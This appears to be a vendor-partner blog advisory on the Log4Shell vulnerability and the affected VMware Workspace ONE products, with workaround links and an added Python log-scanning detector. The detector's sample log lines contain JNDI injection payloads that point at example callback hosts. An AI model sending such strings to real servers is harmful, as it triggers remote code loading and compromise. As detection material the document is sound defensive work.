On December 10, 2021, a 0-day exploit was discovered in the Java logging library Log4j (version 2).
This 0-day has been published by the Common Vulnerabilities and Exposures (CVE) project as CVE-2021-44228 and obtained the maximum CVSS risk score of 10.
Let’s take a look at the situation for the VMware Workspace ONE portfolio products:
Note : We are describing here VMware's response for the Workspace ONE portfolio products only. However, many other VMware products can also be impacted.
What is the Log4j 0-day exploit ?
Broadly speaking, the Log4j 0-day exploit allows an attacker to send a specific message that the targeted server will log. Logging this message can then activate the exploit: the targeted server, via the JNDI API (connection to directories), contacts another, malicious server from which it retrieves the malicious code.
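To check your own logs for this pattern, the following Python code is an added example (not from VMware or the original article): it scans log lines for the JNDI lookup string (`${jndi:`, literal or percent-encoded) and extracts the remote host the server would have contacted, so that it can be compared with outbound connection logs. The log lines and host names are constructed samples, the function names are hypothetical, and only the literal and percent-encoded forms of the string are covered.

```python
import re
from urllib.parse import unquote

# Matches a JNDI lookup expression and captures the scheme and the remote host[:port].
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/\s}]+)", re.IGNORECASE)

def fully_unquote(text, max_rounds=3):
    """Undo percent-encoding, repeated a few times in case of double encoding."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def find_jndi_lookups(lines):
    """Return (line_number, scheme, host) for each JNDI lookup found in lines."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for match in JNDI_RE.finditer(fully_unquote(line)):
            hits.append((number, match["scheme"].lower(), match["host"].lower()))
    return hits

def callback_hosts(hits):
    """Unique hosts a vulnerable server would have contacted (for egress-log correlation)."""
    return sorted({host for _, _, host in hits})

# Constructed sample access-log lines (documentation addresses and example domains only).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Dec/2021:09:14:02 +0000] "GET /portal HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:09:15:40 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://callback.example.net:1389/a}"',
    '198.51.100.7 - - [10/Dec/2021:09:15:41 +0000] '
    '"GET /?q=%24%7BJNDI%3Aldap%3A%2F%2Fcallback.example.org%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    found = find_jndi_lookups(SAMPLE_LOG)
    for number, scheme, host in found:
        print(f"line {number}: JNDI lookup via {scheme} to {host}")
    print("check outbound connections to:", callback_hosts(found))
```

A hit in the request logs only shows that the string was received; an outbound connection from the server to one of the extracted hosts is the sign that the lookup actually ran.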
On December 10, 2021, in response to the Log4Shell exploit, VMware published a security advisory document for all of its impacted products.
This document is available at the following URL :
Please find below the list of impacted Workspace ONE portfolio products:
- VMware Unified Access Gateway version 21.x, 20.x, 3.x
- VMware Workspace ONE Access version 21.x, 20.10.x
- VMware Identity Manager version 3.3.x
- VMware Workspace ONE Access Connector / VMware Identity Manager Connector version 21.x, 20.10.x, 19.03.0.1
Note : Workspace ONE UEM is not impacted by this exploit as this product is based on IIS and not Java Apache.
What workarounds can be applied?
To date, no patch is available for the 4 products above, only workarounds.
Below are the dedicated Knowledge Base articles for each product, describing the workaround instructions:
- VMware Unified Access Gateway : https://kb.vmware.com/s/article/87092
- VMware Identity Manager : https://kb.vmware.com/s/article/87093
- VMware Workspace ONE Access : https://kb.vmware.com/s/article/87090
- VMware Workspace ONE Access Connector : https://kb.vmware.com/s/article/87091
Note : It is recommended to upgrade older versions to newer supported versions first before applying the workaround. This procedure may not work for older unsupported versions.
Note : The vulnerability applies to all versions of Unified Access Gateway appliance when configured for RADIUS or RSA SecurID authentication when used with the Horizon edge service or Web Reverse Proxy edge service.
Those workarounds are therefore temporary until a patch is made available by VMware.
If you have any doubts or questions concerning this subject, feel free to contact us as soon as possible : firstname.lastname@example.org
Stay tuned for more important updates !